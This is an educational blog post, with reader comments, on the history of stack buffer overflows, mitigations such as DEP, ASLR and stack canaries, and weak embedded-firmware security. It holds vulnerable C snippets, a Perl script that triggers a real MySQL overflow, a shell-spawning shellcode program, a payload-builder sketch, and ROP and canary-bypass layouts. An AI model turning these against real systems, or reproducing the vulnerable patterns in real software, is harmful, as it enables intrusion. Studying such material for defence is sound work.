Are buffer-overflows solved yet? A historical tale.

Perhaps the most exciting, scary, and classic security vulnerability is the stack-based buffer overflow. This class of vulnerability goes as far back as the 1970s, and its legendary status is tied to C and Unix itself. One of the first computer worms, the Morris worm, exploited exactly this flaw, and in the late 1980s overflows burst onto the national stage to become a leading security concern. In 1996, one of the most classic and most cited gray-hat security texts was published: in Smashing the Stack for Fun and Profit (PDF), Aleph One describes the attack in gory detail and gives a full step-by-step guide to writing an exploit. These days, this text is required reading for security students and professionals alike. Indeed, the buffer overflow has been so important that countless security research papers have been written attempting to “fix” the problem; the area has been beaten nearly to death by the research community. Despite this, papers are still being written and published today!

So, after a few decades of existence, can we finally put this behind us? Is the overflow defeated yet? It turns out the answer is not straightforward. The buffer overflow is a particularly nasty beast, and despite our best efforts it can still rear its ugly head. The problems can be surprisingly subtle, so to answer our question we must understand these complications.

For those living under a rock for the past 40 years, here is the obligatory buffer-overflow example:

#include <stdio.h>

int main(void) {
    char buffer[256];
    scanf("%s", buffer); /* read an arbitrarily long string from stdin */
    return 0;
}

In this example, scanf will keep reading from the input until it hits whitespace (or end-of-file), no matter how long that input is. Not enough room in the buffer? …no worries, just keep going! There’s nothing important after the 256 bytes, right?

And it’s not just scanf(): there is a huge list of standard C functions that will overrun a buffer in complete silence!
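
The fix, at least for this case, is simply to bound every read. A minimal sketch of two standard remedies, using nothing beyond ISO C:

#include <stdio.h>

int main(void) {
    char buffer[256];

    /* Remedy 1: a field width caps scanf at 255 chars plus the NUL */
    scanf("%255s", buffer);

    /* Remedy 2: fgets never writes past the size you hand it */
    fgets(buffer, sizeof buffer, stdin);
    return 0;
}

Of course, the hard-coded 255 must be kept in sync with the buffer size by hand, which is its own source of bugs.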

OK, this was an easy one – surely a professional C programmer would be informed and avoid writing buffer overflows. Not quite. The following snippet is from a piece of software you probably use indirectly every day; see if you can spot the problem, as it might not be immediately obvious:

/*
  Get privilege for a host, user and db combination

  as db_is_pattern changes the semantics of comparison,
  acl_cache is not used if db_is_pattern is set.
*/

ulong acl_get(const char *host, const char *ip,
              const char *user, const char *db, my_bool db_is_pattern)
{
  ulong host_access= ~(ulong)0, db_access= 0;
  uint i;
  size_t key_length;
  char key[ACL_KEY_LENGTH],*tmp_db,*end;
  acl_entry *entry;
  DBUG_ENTER("acl_get");

  printf("Entered acl_get - len(db): '%d': key_size: %d\n",
strlen(db), sizeof(key));

  mysql_mutex_lock(&acl_cache->lock);
  end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);

  if (lower_case_table_names)
  {
    my_casedn_str(files_charset_info, tmp_db);
    db=tmp_db;
  }
  key_length= (size_t) (end-key);
  if (!db_is_pattern && (entry=(acl_entry*) acl_cache->search((uchar*) key,
                                                              key_length)))
  {
    db_access=entry->access;
    mysql_mutex_unlock(&acl_cache->lock);
    DBUG_PRINT("exit", ("access: 0x%lx", db_access));
    DBUG_RETURN(db_access);
  }

The overflow occurs in the following code:

end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);
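
For context, MySQL’s strmov behaves like the POSIX stpcpy: it copies a string and returns a pointer to the terminating NUL it just wrote, which is what makes the calls chainable. A rough sketch of its behavior (not the actual MySQL source):

/* strmov: copy src into dst, return a pointer to the terminating
   NUL written in dst; convenient for chaining copies */
char *strmov(char *dst, const char *src) {
    while ((*dst = *src++) != '\0')
        dst++;
    return dst;
}

So the chained line concatenates ip, user, and db into key. But key is a fixed-size stack array of ACL_KEY_LENGTH bytes, and none of the three input lengths is ever checked against it: a sufficiently long db name simply writes past the end.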

The following Perl script tickles the overflow with a SQL query (borrowed from here):

  use strict;
  use DBI();

  # Connect to the database.
  my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
                         "user", "secret",
                         {'RaiseError' => 1});

  $a ="A" x 100000;
  my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");
  $sth->execute();

  # Disconnect from the database.
  $dbh->disconnect();

This overflow hails from the MySQL source code, and the flaw was reported in December 2012! The overflow happens extremely deep in the call tree, long after input validation is done, and a rare, specially-crafted query is needed for the code to be executed. Now, the MySQL developers are certainly smart people, yet here is an overflow. How does this happen? Well, what 40 years of overflows have taught us is this: it’s incredibly hard not to write code with buffer overflows!

To drive this point home, here is another example:

char* processNext(char* strm) {
    char buf[512];
    short len = *(short*) strm;
    strm += sizeof(len);
    if (len <= 512) {
        memcpy(buf, strm, len);
        process(buf);
        return strm + len;
    } else {
        return (char*) -1; /* signal an error with -1 */
    }
}

This looks like a completely innocent piece of code: it does a length check and returns -1 when the source buffer is too big. What could go wrong? The answer: negative numbers. If len contains a negative number, the check passes (a negative short is certainly less than 512) and the memcpy proceeds. But memcpy’s size parameter is a size_t, so len is implicitly converted from a short to a size_t and reinterpreted as a huge positive number; and, more importantly, a buffer overflow! There is a whole class of integer-related problems that result in overflows, and like this example they typically appear completely innocent. Even an experienced C programmer is likely to write them on occasion!
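
The implicit conversion is easy to demonstrate in isolation; here is a minimal sketch:

#include <stdio.h>

int main(void) {
    short len = -1;     /* attacker-controlled length field */
    size_t n = len;     /* implicit conversion: the negative value wraps
                           around to a huge unsigned number */
    printf("%zu\n", n); /* prints 18446744073709551615 on a typical
                           64-bit system: memcpy would try to copy ~16 EB */
    return 0;
}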

But hey, it’s 2013; surely we’ve solved this problem with some automatic defenses that can detect overflows and kill programs that have hurtled out of control. Yes, we have, and they are quite good, but unfortunately they’re not perfect.

To understand how the current defenses work, we need a solid understanding of how a buffer-overflow attack is designed. The memory layout of a fictitious buffer overflow — similar to the first example — looks something like this:

<char buffer[256]  (overwrite starts here, at lower addresses)>
<other locals>
<return address>
<function arguments  (higher addresses)>

During the overflow, the memory overwrite starts at the beginning of buffer and proceeds until the NULL byte is reached (assuming a string copy). If the input is longer than the buffer, the data at higher addresses will be overwritten. Most importantly for the attacker, the return address will be overwritten. Controlling the return address allows the attacker to make the program jump to any place in memory when the function attempts to return. This is how an attacker gains control.

The classic approach — the Aleph One era — is to inject some valid x86 machine code and set the return address to jump to it. The injected machine code typically makes a system call to spawn a shell, thus we commonly call it shellcode.

Here’s an example of shellcode in C:

#include <unistd.h>

int main(void) {
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);
}

Now, an attacker would compile this code, extract the raw binary machine code, and construct an input formatted like this (memory grows down):

<garbage to fill buffer and locals><return address: where shell code will be><shellcode>
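
To make that concrete, here is a minimal sketch of a payload builder. Every number in it is hypothetical: BUF_AND_LOCALS and GUESSED_ADDR are made-up stand-ins, and a real exploit must match the exact frame layout and a guessed (or leaked) stack address:

#include <stdio.h>
#include <string.h>

#define BUF_AND_LOCALS 260          /* hypothetical: bytes from buffer to return address */
#define GUESSED_ADDR 0xbffff6c0UL   /* hypothetical: where the shellcode will land */

/* raw machine code extracted from the compiled shell-spawning program */
static unsigned char shellcode[] = { 0x90 /* ...bytes elided... */ };

int main(void) {
    unsigned char payload[512];
    unsigned long ret = GUESSED_ADDR;

    memset(payload, 'A', BUF_AND_LOCALS);                 /* garbage filler    */
    memcpy(payload + BUF_AND_LOCALS, &ret, sizeof ret);   /* clobber ret addr  */
    memcpy(payload + BUF_AND_LOCALS + sizeof ret,         /* shellcode last    */
           shellcode, sizeof shellcode);

    fwrite(payload, 1, BUF_AND_LOCALS + sizeof ret + sizeof shellcode, stdout);
    return 0;
}

Feed its output to the vulnerable program’s stdin. One classic wrinkle: since scanf’s %s stops at whitespace and NUL bytes, the payload must avoid containing them.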

And voilà, you have successfully gained control of some machine! Except it’s not 1996 anymore…

One of the first defenses to emerge is known as Data Execution Prevention (DEP), or W xor X. This defense stipulates that no region of memory may ever be both writable and executable. Now the process will crash if the CPU attempts to fetch an instruction from the stack or the heap. The defense is based on the observation that the attacker is injecting data, not code; since the attacker can only inject data, he should never be able to gain control of the program, right? Well, not exactly.
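
The policy is directly observable from user space. This sketch asks the kernel (via POSIX mmap) for a page that is writable and executable at once; a strictly W-xor-X system such as OpenBSD or a PaX-hardened Linux refuses, while a default Linux typically still grants it:

#include <stdio.h>
#include <sys/mman.h>

int main(void) {
    /* request one page that is readable, writable, AND executable */
    void *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        perror("mmap");  /* a strict W^X kernel lands here */
    else
        printf("got a W+X page at %p: no strict W^X enforcement\n", p);
    return 0;
}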

As it turns out, the code/data duality that is fundamental to von Neumann machines is a tricky beast. What is data? What is code? These seemingly simple questions are actually so difficult that we still don’t have a proper answer. To quote Sergey Bratus et al. — who recently showed that the Intel MMU is itself Turing-complete — “Any sufficiently complex input is indistinguishable from code.” Today, we’ve simply accepted that there really is no distinction.

Thus, it wasn’t long before attackers discovered a work-around: Return-Oriented Programming (ROP). Instead of directly injecting the code to execute, an attacker can chain return jumps together and reuse code that is already in the process. The usual target of this ROP business: the C library (libc).

Perhaps the most obvious target is the system() function, which can be used to execute any shell command the attacker desires (this simplest form is classically known as a return-to-libc attack). Such an exploit might look like this:

<garbage to fill buffer and locals>
<return address: address of system()>
<next return address (for system()): usually just garbage>
<argument 1 to system(): pointer to command string>
<command string>

However, more sophisticated ROP code can be constructed. The returns can be chained, resulting in something of this form:

<garbage to fill buffer and locals>
<1st return address: address of foo()>
<2nd return address: some “gadget” to pop the arguments from the last “call”>
<argument 1 to foo()>
<argument 2 to foo()>
…
<argument n to foo()>
<3rd return address: address of bar()>
<4th return address: some “gadget” to pop the arguments from the last “call”>
<argument 1 to bar()>
<argument 2 to bar()>
…
<argument n to bar()>

Things get a bit trickier on ARM and x86-64 machines, since arguments are passed in registers, but it’s still doable. Hint: we’re in assembly land, so we can jump into the middle of a random function if we want!

Now, it’s easy to think that this technique is strictly less computationally powerful (in a theoretical sense) than injecting pure machine code. However, it turns out that ROP is Turing-complete! This means we could write a compiler for <your-favorite-language-here> that executes your code with only chained returns! (Somebody please do this.) This is the reality of the code/data duality.

To mitigate this threat, Address Space Layout Randomization (ASLR) emerged. This technique enlists the operating system’s memory management to randomize the memory mappings of the stack, the heap, and dynamic libraries (DLLs on Windows, shared objects on Unix). It is no longer easy to jump to a known piece of code in the executable, because the locations vary across executions. Sounds great, right?

Well, there are problems. First, if the code (.text) segment isn’t randomized — as is the case for non-PIE binaries on Linux — the attacker can call any libc function used by the program by jumping into the Procedure Linkage Table (PLT). The PLT is a table of stubs that map into the randomized segments, so randomized code can be called from deterministic addresses — kind of defeating the point. Luckily, only the dynamic library procedures actually used are placed in the PLT, so if your code doesn’t call system(), it will not be there. Second, on a 32-bit system, ASLR is almost worthless. On 32-bit x86 the page size is 4 KB, consuming the lower 12 bits of an address, and a handful of other bits (about 8) are reserved for special regions. This leaves about 12 bits for randomization, a mere 4096 possibilities. This is very easy to brute-force.
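
Both the randomization and the non-randomized .text caveat are easy to observe. Run this sketch a few times: with ASLR enabled, the stack and libc addresses change on every run, while main in a non-PIE executable stays put:

#include <stdio.h>
#include <string.h>

int main(void) {
    int local;
    printf("stack: %p\n", (void *)&local);   /* randomized by ASLR */
    printf("libc : %p\n", (void *)&strcmp);  /* randomized (shared object) */
    printf("main : %p\n", (void *)&main);    /* fixed unless compiled as PIE */
    return 0;
}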

Another ambitious and effective defense appeared at approximately the same time: StackGuard (or stack canaries). The name is a reference to the practice of using a “canary in a coal mine” to determine whether carbon monoxide is present. This defense works in a similar way, placing a random or null value on the stack just before the return address. If an array overflows, the canary value is corrupted; the program can then simply check for corruption before attempting to return. The stack format with stack canaries might look like this:

<256 char exploitable buffer>
<local vars>
<canary value>
<return address>
<function argument 1>
<function argument 2>
…
<function argument N>
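
Conceptually, the instrumentation a flag like GCC’s -fstack-protector adds looks something like the following sketch. It is a simplification: the real checks are emitted by the compiler, not hand-written, though __stack_chk_guard and __stack_chk_fail are real glibc symbols:

/* simplified sketch of compiler-emitted canary checking */
extern unsigned long __stack_chk_guard;  /* random value chosen at startup */
extern void __stack_chk_fail(void);      /* aborts: "stack smashing detected" */

void func(void) {
    unsigned long canary = __stack_chk_guard;  /* prologue: stash a copy */
    char buffer[256];
    /* ... body that might overflow buffer ... */
    (void)buffer;
    if (canary != __stack_chk_guard)           /* epilogue: verify the copy */
        __stack_chk_fail();                    /* corrupted: abort the process */
}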

The stack canary defense is among the hardest to defeat, but it can be done. Consider this code, where the stack canary value is 0 (this isn’t uncommon) and ASLR is not enabled:

// dest will always point to a buffer with at least 256 chars
void func(char *dest) {
  char buffer[256];
  char *src = &buffer[0];
  scanf("%s", src);
  strncpy(dest, src, 255);
  dest[255] = '\0';
}

The scanf() provides a buffer overflow, but the method for defeating StackGuard may not be as clear. To understand it, imagine that the stack layout looks like this:

<char buffer[256]>
<char *src>
<stack canary>
<return address>
<char *dest>

With this layout, an attacker can overwrite both src and dest during the overflow, so the remaining code may not do what the programmer intended. If the stack canary is a null byte, restoring it is easy: the attacker simply redirects dest such that &dest[255] points to the address of the stack canary. Then the dest[255] = '\0' statement restores the canary.
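
In the layout convention used above, the crafted input leaves the frame looking something like this (hypothetical, matching the scenario just described):

<char buffer[256]: filler, or shellcode if DEP permits>
<char *src: clobbered; must still point somewhere readable (e.g. back into buffer)>
<stack canary: clobbered with non-zero garbage by the string copy>
<return address: attacker-chosen target>
<char *dest: redirected so that &dest[255] is exactly the canary’s address>

The subsequent strncpy writes harmlessly into attacker-controlled territory, and the dest[255] = '\0' assignment repairs the null canary just in time for the epilogue check to pass.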

Now, with all three of these defenses (DEP, ASLR, and StackGuard) in place, a successful attack can be incredibly difficult. So let’s return to our original question: are buffer overflows a solved problem now? The answer is still not clear… On a modern PC with all these defenses, one could argue that the problem is mitigated, but I want to consider a much broader application. In 2013, the computing landscape is wider than ever before, and there is an emerging class of devices challenging the status quo: embedded systems. Here lies the problem.

In the 1990s and 2000s we witnessed an outbreak of security problems on PCs as they were connected to the internet for the first time. In the 2010s, it’s the embedded world that is increasingly being connected, and sadly the results are reminiscent of the past. There are countless recent, blatant vulnerabilities in this class of devices, including GoPro cameras, internet routers, cars, and remote server management hardware (IPMI). But our triplet of defenses should have solved this! And we have many wonderful new systems languages that do away with the issue (D, Go, Rust, etc.). Why is this still a problem?!

The problem is culture.

In recent work, some colleagues and I reverse-engineered firmware used on a remote management interface (IPMI). This class of device is used to remotely control servers, allowing an administrator to power-cycle the machine, install operating systems, and perform remote monitoring. What we discovered was appalling: there were trivial buffer overflows (like the first example) in the login page, and the only defense in place was an extremely limited form of ASLR. At least 40,000 such machines were connected directly to the internet. The result was completely stunning.

After searching for answers, I stumbled upon this: embedded culture runs completely contrary to classical PC and server software development. Many people describe the embedded industry as incredibly fast-moving, leaving little time to do things the “right way”. They depict managers who urge developers to push their products out the door as soon as humanly possible, and an attitude that worrying about security is a waste of one’s time. Stunningly, I’ve even met firmware developers who had never heard of a buffer overflow! They appeared genuinely shocked when I explained the concept.

The embedded world has long enjoyed the “coffee-pot domain”, where applications have simple, well-defined use cases. Who cares if your coffee machine has buffer overflows? What could an attacker do, other than cause a big inconvenience? (It’s not like we’re addicted to caffeine ;-).) However, if an attacker uses an embedded device to gain complete control of your server (or car), the potential damage is nearly immeasurable.

Today, embedded is the new threat, and many of these attacks are the result of some negligent buffer overflow. While we have a fairly good handle on buffer overflows from the technical side, we still struggle with the problem socially. Correcting it requires an industry culture shift and a lot of developer education.

However, writing good and secure code requires the ability to “think like an attacker”: some background understanding of how software can be exploited and where the defenses can fail. In this post I have attempted to provide just that, but my treatment has been minimal. To really understand, you have to write your own buffer-overflow attack. Not only is it fun, but you never fully understand a problem until you’ve had to solve it.

In future posts, I may begin a “Buffer-overflow Tutorial” series, giving step-by-step walk-throughs of real buffer-overflow exploits (for example, the MySQL overflow above!). Until then, happy hacking!

 

7 thoughts on “Are buffer-overflows solved yet? A historical tale.”

    1. ajbonkoski@gmail.com Post author

      I’m not sure yet: I’m still considering the idea and the form. I’d even thought that a buffer-overflow challenge/competition site would be fun: think Project Euler style. Thanks for this link though, I’ll use it for inspiration.

      1. droope

        Heyya!

        I am a big fan of hackthissite.org; maybe you should consider cooperating with them instead of starting from scratch!

        Regards,
        Pedro

  1. Jeremiah Gowdy

    I think the real issue we need to get away from is the idea that the stack used for CALL is the same as the stack used for parameters (depending on the calling convention) and locals. If you split the two stacks, the technique doesn’t seem usable. With that you’d have the additional option of making the call stack read only except for CALL/RET and possibly a stack unwinding instruction for exceptions. The other option is what Itanium did with branch registers that overflow into a backing store. Obviously the branch register solution requires a different CPU architecture, but it would seem like you could implement split stacks by calling convention. It would probably create bad register pressure on x86 32bit, but with the extra registers of x64 it might be feasible. What are your thoughts?

    1. ajbonkoski@gmail.com Post author

      This is an interesting idea that I’ve indeed had as well. It may work if implemented very carefully (there are a LOT of corner cases). However, I’m not convinced that current architectures can support it without unreasonable performance overhead. For one, memory protections aren’t as fine-grained as you propose, so a CALL/RET would likely need to cross an OS boundary. Otherwise, the split stack would be writable by any store instruction, which still allows a specially-crafted overflow to modify the addresses. There are a lot of complications here, but it’d be interesting to see whether future architectures implement some of these fine-grained memory protections.
